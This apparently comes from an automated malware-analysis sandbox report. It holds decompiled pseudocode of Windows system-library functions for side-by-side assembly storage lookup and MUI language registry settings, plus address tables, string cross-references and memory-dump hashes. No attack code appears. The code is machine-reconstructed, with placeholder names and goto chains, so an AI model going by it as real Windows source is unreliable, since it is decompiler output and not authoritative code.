				if(_t272 == 0 || _t286 < 1 || _t286 >  *((intOrPtr*)(_t175 + 4))) {
					_t282 =  *((intOrPtr*)(_t175 + 4));
					goto L66;
				} else {
					if( *((intOrPtr*)( *((intOrPtr*)(_t175 + 8)) + _t286 * 4)) != 0) {
						goto L23;
					}
					_t284 =  *((intOrPtr*)(_t272 + 0x18)) + _t272;
					_t191 =  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0xc)) + _t286 * 0x18 + _t272 + 0x10)) + _t272;
					_t291 =  *((intOrPtr*)(_t191 + 0x50));
					_t282 =  *((intOrPtr*)(_t284 + 0x10)) + _t272;
					if( *((intOrPtr*)(_t191 + 0x50)) > 0xfffe) {
						_push(_t272);
						E00993F92(0x33, 0, "SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p\n", _t291);
						L39:
						_t288 = 0xc0000106;
						goto L20;
					}
					if(( *(_t191 + 4) & 0x00000010) != 0) {
						L27:
						_v1076 =  &_v1160;
						_t286 =  *((intOrPtr*)(_t191 + 0x18)) + _t282;
						_v1080 = _t286;
						if(_t286 == 0) {
							_t288 = 0xc00000e5;
							goto L23;
						}
						_t193 = E00958342(_t286, 0x5c);
						_pop(_t272);
						if(_t193 == 0) {
							_t288 = 0xc00000e5;
							goto L20;
						}
						_t286 = (_t193 - _t286 >> 0x00000001) + (_t193 - _t286 >> 0x00000001) + 0x00000004 & 0x0000ffff;
						if(_t286 > 0x208) {
							if(_t286 > 0xfffe) {
								goto L39;
							}
							_v1086 = _t286;
							_t200 =  *0x94e6f4(_t286 & 0x0000ffff);
							_v1084 = _t200;
							if(_t200 != 0) {
								_v1076 =  &_v1088;
								goto L30;
							}
							_t288 = 0xc0000017;
							goto L20;
						}
						L30:
						_t292 = _t286 & 0x0000ffff;
						E00942340(_v1076[2], _v1080, _t292 - 2);
						_t272 = 0;
						 *((short*)(_v1076[2] + (_t292 >> 1) * 2 - 2)) = 0;
						_t296 = _t296 + 0xc;
						 *_v1076 = _t286;
						L15:
						if(_v1068 == 0) {
							if(E0095DA3A(_v1076[2],  &_v1128, 0,  &_v1180) == 0) {
								E00993F92(0x33, 0, "SXS: Attempt to translate DOS path name \"%S\" to NT format failed\n", _v1076[2]);
								_t288 = 0xc000003a;
								goto L18;
							}
							_v1136 = _v1124;
							_t215 = _v1180;
							if(_t215 != 0) {
								_v1128 = _t215;
								_v1124 = _v1176;
							} else {
								_v1172 = 0;
							}
							_v1200 = _v1172;
							_push(0x21);
							_v1196 =  &_v1128;
							_push(3);
							_push( &_v1212);
							_push( &_v1204);
							_push(0x100020);
							_v1204 = 0x18;
							_v1192 = 0x40;
							_v1188 = 0;
							_v1184 = 0;
							_t288 = E0093FD74( &_v1068);
							E0095A331( &_v1180, _t272,  &_v1180);
							if(_t288 >= 0) {
								goto L16;
							} else {
								_push(_t288);
								E00993F92(0x33, 0, "SXS: Unable to open assembly directory under storage root \"%S\"; Status = 0x%08lx\n", _v1076[2]);
								goto L18;
							}
						}
						L16:
						_t226 = E0096CC91(_v1164, _a12, _v1076,  &_v1068);
						_t288 = _t226;
						if(_t226 < 0) {
							E00993F92(0x33, 0, "SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx\n", _t288);
						} else {
							_t288 = 0;
						}
						goto L18;
					}
					_v1076 = 0;
					_t294 =  *((intOrPtr*)(_t191 + 0x50));
					_v1152 = _t294;
					_v1150 = _t294;
					_v1148 =  *((intOrPtr*)(_t191 + 0x54)) + _t282;
					_v1108 = 0;
					_v1106 = 0x216;
					_v1104 =  &_v544;
					_v1120 = _t272;
					_v1116 = _t286;
					_v1112 = 0;
					_v1100 = 0;
					_v1092 = 0;
					_v1096 = 0;
					_v1132(1,  &_v1120, _v1140);
					if(_v1092 != 0) {
						_t288 = 0xc0000120;
						goto L20;
					}
					if(_v1100 != 0) {
						_t288 = E0096D088(0,  &_v1108,  &_v1152,  &_v1160,  &_v1088,  &_v1076,  &_v1068);
						if(_t288 >= 0) {
							_t288 = E0096CC91(_v1164, _t286,  &_v1108,  &_v1068);
							if(_t288 >= 0) {
								_t288 = 0;
								goto L20;
							}
							_push(_t288);
							_push(_t286);
							_push("SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx\n");
							L50:
							_push(0);
							_push(0x33);
							E00993F92();
							goto L20;
						}
						_push(_t288);
						_push( &_v1108);
						_push("SXS: Attempt to probe known root of assembly storage (\"%wZ\") failed; Status = 0x%08lx\n");
						goto L50;
					}
					_v1144 = _v1112;
					_t250 = _v1096;
					_t286 = 0;
					_v1080 = _t250;
					_v1069 = 1;
					if(_t250 <= 0) {
						L14:
						if(_t286 == _v1080) {
							L59:
							_push(_t286);
							E00993F92(0x33, 0, "SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries\n",  &_v1152);
							_t288 = 0xc0150004;
							goto L19;
						}
						goto L15;
					} else {
						goto L10;
					}
					while(1) {
						L10:
						_v1120 = _v1144;
						_v1108 = 0;
						_v1106 = 0x216;
						_v1104 =  &_v544;
						_v1116 = _t286;
						_v1112 = 0;
						_v1111 = 0;
						_v1132(2,  &_v1120, _v1140);
						if(_v1112 != 0) {
							break;
						}
						if(_v1111 != 0) {
							if(_v1108 == 0) {
								goto L59;
							}
							_t159 = _t286 + 1; // 0x1
							_v1080 = _t159;
						}
						if(_v1108 != 0) {
							if(_v1068 != 0) {
								E0093F9F0(_v1068);
								_v1068 = 0;
							}
							_t288 = E0096D088(0,  &_v1108,  &_v1152,  &_v1160,  &_v1088,  &_v1076,  &_v1068);
							if(_t288 >= 0) {
								goto L14;
							} else {
								if(_t288 == 0xc0150004) {
									goto L13;
								} else {
									_push(_t288);
									_push( &_v1152);
									E00993F92(0x33, 0, "SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx\n",  &_v1108);
									goto L19;
								}
								goto L27;
							}
						}
						L13:
						_t286 = _t286 + 1;
						if(_t286 < _v1080) {
							continue;
						}
						goto L14;
					}
					_t288 = 0xc0000120;
					goto L19;
				}
			}
































































                                                                                                                                                              0x0096c5fb
                                                                                                                                                              0x0096c602
                                                                                                                                                              0x0096c608
                                                                                                                                                              0x0096c60b
                                                                                                                                                              0x0096c60e
                                                                                                                                                              0x0096c617
                                                                                                                                                              0x0096c61f
                                                                                                                                                              0x0096c62e
                                                                                                                                                              0x0096c63c
                                                                                                                                                              0x0096c642
                                                                                                                                                              0x0096c644
                                                                                                                                                              0x0096c647
                                                                                                                                                              0x0096c64a
                                                                                                                                                              0x0096c650
                                                                                                                                                              0x0096c656
                                                                                                                                                              0x0096c65c
                                                                                                                                                              0x0096c662
                                                                                                                                                              0x0096c669
                                                                                                                                                              0x0096c670
                                                                                                                                                              0x0096c676
                                                                                                                                                              0x0096c67d
                                                                                                                                                              0x0096c684
                                                                                                                                                              0x0096c68a
                                                                                                                                                              0x0096c692
                                                                                                                                                              0x009a557b
                                                                                                                                                              0x009a557d
                                                                                                                                                              0x009a557d
                                                                                                                                                              0x009a557e
                                                                                                                                                              0x009a557f
                                                                                                                                                              0x009a5580
                                                                                                                                                              0x009a558e
                                                                                                                                                              0x009a5596
                                                                                                                                                              0x0096c874
                                                                                                                                                              0x0096c87a
                                                                                                                                                              0x0096c89d
                                                                                                                                                              0x0096c8a3
                                                                                                                                                              0x009a55a6
                                                                                                                                                              0x009a55a6
                                                                                                                                                              0x0096c8af
                                                                                                                                                              0x009a55b7
                                                                                                                                                              0x009a55b7
                                                                                                                                                              0x0096c8bb
                                                                                                                                                              0x009822ee
                                                                                                                                                              0x009822ee
                                                                                                                                                              0x0096c8c1
                                                                                                                                                              0x0096c8d1
                                                                                                                                                              0x0096c8d1
                                                                                                                                                              0x0096c87c
                                                                                                                                                              0x0096c888
                                                                                                                                                              0x0096c897
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0096c897
                                                                                                                                                              0x0096c69a
                                                                                                                                                              0x009822f8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0096c6b2
                                                                                                                                                              0x0096c6b8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0096c6c6
                                                                                                                                                              0x0096c6d4
                                                                                                                                                              0x0096c6d6
                                                                                                                                                              0x0096c6d9
                                                                                                                                                              0x0096c6e1
                                                                                                                                                              0x009a5384
                                                                                                                                                              0x009a538e
                                                                                                                                                              0x009a5396
                                                                                                                                                              0x009a5396
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a5396
                                                                                                                                                              0x0096c6eb
                                                                                                                                                              0x00982196
                                                                                                                                                              0x0098219c
                                                                                                                                                              0x009821a5
                                                                                                                                                              0x009821a7
                                                                                                                                                              0x009821ad
                                                                                                                                                              0x009a53a0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a53a0
                                                                                                                                                              0x009821b6
                                                                                                                                                              0x009821bc
                                                                                                                                                              0x009821bf
                                                                                                                                                              0x009a53aa
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a53aa
                                                                                                                                                              0x009821cd
                                                                                                                                                              0x009821d8
                                                                                                                                                              0x009a53bc
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a53c2
                                                                                                                                                              0x009a53c9
                                                                                                                                                              0x009a53cf
                                                                                                                                                              0x009a53d7
                                                                                                                                                              0x009a53e9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a53e9
                                                                                                                                                              0x009a53d9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a53d9
                                                                                                                                                              0x009821de
                                                                                                                                                              0x009821de
                                                                                                                                                              0x009821f4
                                                                                                                                                              0x00982204
                                                                                                                                                              0x00982206
                                                                                                                                                              0x00982211
                                                                                                                                                              0x00982217
                                                                                                                                                              0x0096c841
                                                                                                                                                              0x0096c847
                                                                                                                                                              0x0098223e
                                                                                                                                                              0x009a5405
                                                                                                                                                              0x009a540d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a540d
                                                                                                                                                              0x0098224a
                                                                                                                                                              0x00982250
                                                                                                                                                              0x00982259
                                                                                                                                                              0x009a552f
                                                                                                                                                              0x009a553b
                                                                                                                                                              0x0098225f
                                                                                                                                                              0x0098225f
                                                                                                                                                              0x0098225f
                                                                                                                                                              0x0098226b
                                                                                                                                                              0x00982271
                                                                                                                                                              0x00982279
                                                                                                                                                              0x0098227f
                                                                                                                                                              0x00982287
                                                                                                                                                              0x0098228e
                                                                                                                                                              0x0098228f
                                                                                                                                                              0x0098229b
                                                                                                                                                              0x009822a5
                                                                                                                                                              0x009822af
                                                                                                                                                              0x009822b5
                                                                                                                                                              0x009822c0
                                                                                                                                                              0x009822c9
                                                                                                                                                              0x009822d0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009822d6
                                                                                                                                                              0x009a554c
                                                                                                                                                              0x009a5558
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a555d
                                                                                                                                                              0x009822d0
                                                                                                                                                              0x0096c84d
                                                                                                                                                              0x0096c863
                                                                                                                                                              0x0096c868
                                                                                                                                                              0x0096c86c
                                                                                                                                                              0x009a556e
                                                                                                                                                              0x0096c872
                                                                                                                                                              0x0096c872
                                                                                                                                                              0x0096c872
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0096c86c
                                                                                                                                                              0x0096c6f7
                                                                                                                                                              0x0096c6fd
                                                                                                                                                              0x0096c701
                                                                                                                                                              0x0096c708
                                                                                                                                                              0x0096c714
                                                                                                                                                              0x0096c71c
                                                                                                                                                              0x0096c728
                                                                                                                                                              0x0096c735
                                                                                                                                                              0x0096c744
                                                                                                                                                              0x0096c74a
                                                                                                                                                              0x0096c750
                                                                                                                                                              0x0096c756
                                                                                                                                                              0x0096c75c
                                                                                                                                                              0x0096c762
                                                                                                                                                              0x0096c768
                                                                                                                                                              0x0096c774
                                                                                                                                                              0x009a5417
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a5417
                                                                                                                                                              0x0096c780
                                                                                                                                                              0x009a5451
                                                                                                                                                              0x009a5455
                                                                                                                                                              0x009a548e
                                                                                                                                                              0x009a5492
                                                                                                                                                              0x009a549d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a549d
                                                                                                                                                              0x009a5494
                                                                                                                                                              0x009a5495
                                                                                                                                                              0x009a5496
                                                                                                                                                              0x009a5464
                                                                                                                                                              0x009a5464
                                                                                                                                                              0x009a5465
                                                                                                                                                              0x009a5467
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a546c
                                                                                                                                                              0x009a5457
                                                                                                                                                              0x009a545e
                                                                                                                                                              0x009a545f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a545f
                                                                                                                                                              0x0096c78c
                                                                                                                                                              0x0096c792
                                                                                                                                                              0x0096c798
                                                                                                                                                              0x0096c79a
                                                                                                                                                              0x0096c7a0
                                                                                                                                                              0x0096c7a9
                                                                                                                                                              0x0096c835
                                                                                                                                                              0x0096c83b
                                                                                                                                                              0x009a54df
                                                                                                                                                              0x009a54df
                                                                                                                                                              0x009a54ef
                                                                                                                                                              0x009a54f7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a54f7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0096c7af
                                                                                                                                                              0x0096c7af
                                                                                                                                                              0x0096c7bb
                                                                                                                                                              0x0096c7c3
                                                                                                                                                              0x0096c7cf
                                                                                                                                                              0x0096c7dc
                                                                                                                                                              0x0096c7eb
                                                                                                                                                              0x0096c7f1
                                                                                                                                                              0x0096c7f7
                                                                                                                                                              0x0096c7fd
                                                                                                                                                              0x0096c809
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0096c815
                                                                                                                                                              0x009a54ab
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a54ad
                                                                                                                                                              0x009a54b0
                                                                                                                                                              0x009a54b0
                                                                                                                                                              0x0096c822
                                                                                                                                                              0x0096d03e
                                                                                                                                                              0x009a54c1
                                                                                                                                                              0x009a54c6
                                                                                                                                                              0x009a54c6
                                                                                                                                                              0x0096d074
                                                                                                                                                              0x0096d078
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0096d07e
                                                                                                                                                              0x009a54d7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a54dd
                                                                                                                                                              0x009a550b
                                                                                                                                                              0x009a5512
                                                                                                                                                              0x009a5522
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a5527
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a54d7
                                                                                                                                                              0x0096d078
                                                                                                                                                              0x0096c828
                                                                                                                                                              0x0096c828
                                                                                                                                                              0x0096c82f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0096c82f
                                                                                                                                                              0x009a5501
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a5501

                                                                                                                                                              Strings
                                                                                                                                                              • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 009A54E7
                                                                                                                                                              • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 009A5496
                                                                                                                                                              • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 009A5566
                                                                                                                                                              • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 009A53FD
                                                                                                                                                              • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 009A5586
                                                                                                                                                              • RtlpResolveAssemblyStorageMapEntry, xrefs: 009A5581
                                                                                                                                                              • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 009A545F
                                                                                                                                                              • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 009A5386
                                                                                                                                                              • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 009A5550
                                                                                                                                                              • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 009A551A
                                                                                                                                                              • @, xrefs: 009822A5
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                                                              • API String ID: 0-4009184096
                                                                                                                                                              • Opcode ID: 550bb24755ff4c7e1caa0e9c11807aceaabe732cb0f23b97343a8a8e3d7406e4
                                                                                                                                                              • Instruction ID: c068a06e22e5837e62a5878c2c09953578b1f5744495755bd7bbc01e4e312b74
                                                                                                                                                              • Opcode Fuzzy Hash: 550bb24755ff4c7e1caa0e9c11807aceaabe732cb0f23b97343a8a8e3d7406e4
                                                                                                                                                              • Instruction Fuzzy Hash: 7D023DF2D006289FDB30DF54CC84BAEB7B8AF59304F4541EAE649A7211E6309E84CF59
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 009DAC5E, Relevance: 12.1, Strings: 9, Instructions: 855COMMONCrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                              			E009DAC5E(signed int _a4, signed int _a8, intOrPtr* _a12) {
				signed int _v8;
				void _v34;
				char _v36;
				signed int _v40;
				int _v44;
				signed int _v48;
				signed int _v50;
				signed int _v52;
				intOrPtr _v56;
				short _v58;
				signed short _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed int _v76;
				signed int _v80;
				int _v84;
				short _v86;
				char _v88;
				int _v92;
				int _v96;
				int _v100;
				int _v104;
				int _v108;
				int _v112;
				int _v116;
				int _v120;
				int _v124;
				int _v128;
				int _v132;
				signed short _v136;
				int _v140;
				char _v144;
				char _v148;
				signed short _v152;
				intOrPtr* _v156;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t405;
				signed int _t411;
				signed int _t415;
				signed int _t417;
				signed int _t418;
				signed int _t423;
				signed int _t444;
				void* _t447;
				signed int _t449;
				signed int _t453;
				signed int _t461;
				signed int _t467;
				signed int _t472;
				signed int _t477;
				short _t480;
				signed int _t483;
				signed int _t485;
				signed int _t493;
				signed int _t499;
				signed int _t502;
				signed int _t509;
				signed int _t513;
				signed int _t515;
				signed int _t520;
				signed int _t523;
				signed int _t531;
				int _t534;
				signed short _t535;
				signed int _t541;
				signed int _t546;
				signed int _t547;
				signed int _t548;
				signed int _t553;
				signed int _t557;
				signed int _t562;
				signed int _t567;
				signed int _t569;
				signed int _t571;
				signed int _t575;
				signed int _t579;
				signed char _t580;
				signed short* _t581;
				signed int _t583;
				signed int _t585;
				signed int _t590;
				signed int _t591;
				signed int _t597;
				int _t600;
				signed int _t605;
				signed int _t607;
				signed int _t612;
				signed int _t615;
				signed int _t619;
				signed int _t621;
				signed int _t623;
				signed int _t633;
				signed int _t634;
				signed int _t637;
				void* _t639;
				intOrPtr* _t640;
				signed int _t643;
				signed int _t644;
				int _t645;
				signed int _t646;
				signed int _t648;
				signed int _t649;
				int _t650;
				signed int _t653;
				signed int _t654;
				signed int _t657;
				signed int _t658;
				signed int _t660;
				signed int _t661;

				_t405 =  *0xa22088; // 0x7741ce3b
				_v8 = _t405 ^ _t661;
				_t640 = _a12;
				_t621 = _a8;
				_t654 = 0;
				_v36 = 0;
				_t623 = 6;
				memset( &_v34, 0, _t623 << 2);
				_v156 = _t640;
				_v104 = 0;
				_v96 = 0;
				_v100 = 0;
				_v80 = 0;
				_v140 = 0;
				_v124 = 0;
				_v132 = 0;
				_v44 = 0;
				_v136 = 0;
				_v116 = 0;
				asm("stosw");
				_v120 = 0;
				_v92 = 0;
				_v72 = 0;
				_v108 = 0;
				_v128 = 0;
				_v64 = _t621;
				_v152 = 0;
				_v112 = 0;
				_v148 = 0;
				if(_t640 != 0) {
					__eflags = _a4;
					if(_a4 == 0) {
						_a4 = 0x4808;
					}
					_t625 = _a4;
					__eflags = _t625 & 0xffff0363;
					if((_t625 & 0xffff0363) != 0) {
						goto L1;
					}
					__eflags = _t625 & 0x00000400;
					if((_t625 & 0x00000400) == 0) {
						L8:
						__eflags = _t625 & 0x00008000;
						if((_t625 & 0x00008000) == 0) {
							L11:
							_t415 = _t625 & 0x00000008;
							__eflags = _t415;
							if(_t415 == 0) {
								L13:
								_t643 = 0x800;
								__eflags = 0x00000800 & _t625;
								if((0x00000800 & _t625) == 0) {
									L15:
									__eflags = _t625 & 0x00000010;
									if((_t625 & 0x00000010) == 0) {
										L18:
										__eflags = _t415 - _t654;
										if(_t415 == _t654) {
											__eflags = _t625 & 0x00000004;
											if((_t625 & 0x00000004) == 0) {
												_t625 = _t625 | 0x00000008;
												__eflags = _t625;
												_a4 = _t625;
											}
										}
										__eflags = _t625 & 0x0000e400;
										if((_t625 & 0x0000e400) == 0) {
											__eflags = _t625 & 0x00000010;
											if((_t625 & 0x00000010) == 0) {
												_t625 = _t625 | 0x00004000;
												__eflags = _t625;
												_a4 = _t625;
											}
										}
										__eflags = _t625 & 0x00001c00;
										if((_t625 & 0x00001c00) == 0) {
											_t625 = _t625 | _t643;
											__eflags = _t625;
											_a4 = _t625;
										}
										_push( &_v72);
										__eflags = _t625;
										if(_t625 >= 0) {
											_t411 = E0095830B();
										} else {
											_t411 = E00968615();
										}
										__eflags = _t411 - _t654;
										_v40 = _t411;
										if(_t411 < _t654) {
											L189:
											return E0094E1B4(_t411, _t621, _v8 ^ _t661, _t640, _t643, _t654);
										} else {
											__eflags = _t621 - _t654;
											if(_t621 == _t654) {
												_t417 = 4;
												_v50 = _t417;
												_t418 = 2;
												_v52 = _t418;
												_v48 = 0x949698;
												L112:
												__eflags = _a4 & 0x00000400;
												_t644 = _v48;
												if((_a4 & 0x00000400) == 0) {
													L124:
													__eflags = _a4 & 0x00000010;
													if((_a4 & 0x00000010) == 0) {
														L127:
														__eflags = _a4 & 0x00004000;
														if(__eflags == 0) {
															L142:
															__eflags = _v80;
															if(_v80 != 0) {
																E0093F9F0(_v80);
																_t310 =  &_v80;
																 *_t310 = _v80 & 0x00000000;
																__eflags =  *_t310;
															}
															_t621 = _a4 & 0x00008000;
															__eflags = _t621;
															if(_t621 != 0) {
																__eflags = _a4 & 0x00000800;
																if(__eflags != 0) {
																	_v40 = E009D98E3(_t640, __eflags, _v52, _t644);
																	_v124 = _v44;
																}
															}
															__eflags = _a4 & 0x00002000;
															if((_a4 & 0x00002000) != 0) {
																L150:
																E0094E2A8(_t625,  &_v60, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\MUI\\Settings");
																_t621 = 0;
																_t423 = E009D8E1A( &_v60, 0, 0, 0xf003f,  &_v96, 0);
																__eflags = _t423;
																_v40 = _t423;
																if(_t423 < 0) {
																	goto L168;
																}
																__eflags = _a4 & 0x00000800;
																if((_a4 & 0x00000800) == 0) {
																	_t645 = _v44;
																	__eflags = _t645 - 2;
																	if(_t645 < 2) {
																		L167:
																		_v40 = 0xc000000d;
																		goto L168;
																	}
																	E0094E2A8(_t625,  &_v60, L"LanguageConfiguration");
																	_t444 = E009D8E1A( &_v60, _v96, 0, 0xf003f,  &_v80, 0);
																	__eflags = _t444;
																	_v40 = _t444;
																	if(_t444 < 0) {
																		goto L168;
																	}
																	_t657 = _v64;
																	E0094E2A8(_t625,  &_v60, _t657);
																	__eflags = _t657;
																	if(_t657 == 0) {
																		_t447 = 0;
																		__eflags = 0;
																		L161:
																		_t625 = _v50 - _v58 & 0x0000ffff;
																		_push(_v50 - _v58 & 0x0000ffff);
																		_push(_t447);
																		_push(7);
																		_push(_t621);
																		_push( &_v60);
																		_t449 = E009401D4(_v80);
																		__eflags = _t449 - _t621;
																		_v40 = _t449;
																		if(_t449 < _t621) {
																			goto L168;
																		}
																		_v124 = _t645;
																		goto L163;
																	}
																	_t453 = _t657;
																	_t640 = _t453 + 2;
																	do {
																		_t633 =  *_t453;
																		_t453 = _t453 + 2;
																		__eflags = _t633;
																	} while (_t633 != 0);
																	_t447 = _t657 + 2 + (_t453 - _t640 >> 1) * 2;
																	goto L161;
																}
																E0094E2A8(_t625,  &_v60, L"PreferredUILanguages");
																_push(_v50 & 0x0000ffff);
																_push(_t644);
																_push(7);
																_push(0);
																_push( &_v60);
																_t461 = E009401D4(_v96);
																__eflags = _t461;
																_v40 = _t461;
																if(_t461 < 0) {
																	goto L168;
																}
																_v124 = _v44;
																goto L163;
															} else {
																__eflags = _t621;
																if(_t621 == 0) {
																	L163:
																	__eflags = _v40;
																	if(_v40 >= 0) {
																		__eflags = _a4 & 0x0000e410;
																		if((_a4 & 0x0000e410) != 0) {
																			_push(0);
																			_push(0);
																			E00940C90(8);
																			__eflags = _a4 & 0x00008410;
																			if((_a4 & 0x00008410) != 0) {
																				E009D8603(_t625);
																			}
																		}
																	}
																	L168:
																	__eflags = _v128;
																	if(_v128 != 0) {
																		E0094E025(_t625,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v128);
																	}
																	L170:
																	__eflags = _v112;
																	if(_v112 != 0) {
																		E0094E025(_t625,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v112);
																	}
																	__eflags = _v108;
																	if(_v108 != 0) {
																		E0094E025(_t625,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v108);
																	}
																	L174:
																	_t654 = 0;
																	__eflags = _v80;
																	if(_v80 != 0) {
																		E0093F9F0(_v80);
																		_v80 = 0;
																	}
																	__eflags = _v100 - _t654;
																	if(_v100 != _t654) {
																		E0093F9F0(_v100);
																		_v100 = _t654;
																	}
																	__eflags = _v96 - _t654;
																	if(_v96 != _t654) {
																		E0093F9F0(_v96);
																		_v96 = _t654;
																	}
																	__eflags = _v104 - _t654;
																	if(_v104 != _t654) {
																		E0093F9F0(_v104);
																		_v104 = _t654;
																	}
																	__eflags = _v120 - _t654;
																	if(_v120 != _t654) {
																		E0094E025(_t625,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t654, _v120);
																	}
																	_t643 = _v40;
																	L185:
																	if((_a4 & 0x00000080) != 0 && _v72 != _t654) {
																		E009EBDF9(_t643, _v72);
																	}
																	 *_v156 = _v132 + _v124 + _v140;
																	_t411 = _t643;
																	goto L189;
																}
																__eflags = _a4 & 0x00001000;
																if((_a4 & 0x00001000) == 0) {
																	goto L163;
																}
																goto L150;
															}
														}
														_t467 = E00962476(_t625, _t640, __eflags, 0x2000000,  &_v104);
														_v40 = _t467;
														__eflags = _t467;
														if(_t467 < 0) {
															goto L168;
														}
														E0094E2A8(_t625,  &_v60, L"Control Panel\\Desktop");
														_t472 = E00968CEE( &_v60, _v104, 0xf003f,  &_v100);
														_v40 = _t472;
														__eflags = _t472;
														if(_t472 < 0) {
															goto L168;
														}
														__eflags = _a4 & 0x00000800;
														if((_a4 & 0x00000800) == 0) {
															__eflags = _v44 - 2;
															if(_v44 < 2) {
																goto L167;
															}
															E0094E2A8(_t625,  &_v60, L"LanguageConfigurationPending");
															_t477 = E009D8E1A( &_v60, _v100, 0, 0xf003f,  &_v80, 0);
															_v40 = _t477;
															__eflags = _t477;
															if(_t477 < 0) {
																goto L168;
															}
															_t646 = _v64;
															E0094E2A8(_t625,  &_v60, _t646);
															__eflags = _t646;
															if(_t646 == 0) {
																_t644 = 0;
																__eflags = 0;
																L139:
																_t480 = _v58;
																_v52 = _v52 - _t480;
																_t300 =  &_v50;
																 *_t300 = _v50 - _t480;
																__eflags =  *_t300;
																_push(_v50 & 0x0000ffff);
																_push(_t644);
																_push(7);
																_push(0);
																_push( &_v60);
																_push(_v80);
																L140:
																_t483 = E009401D4();
																_v40 = _t483;
																__eflags = _t483;
																if(_t483 < 0) {
																	goto L168;
																}
																_v140 = _v44;
																goto L142;
															}
															_t485 = _t646;
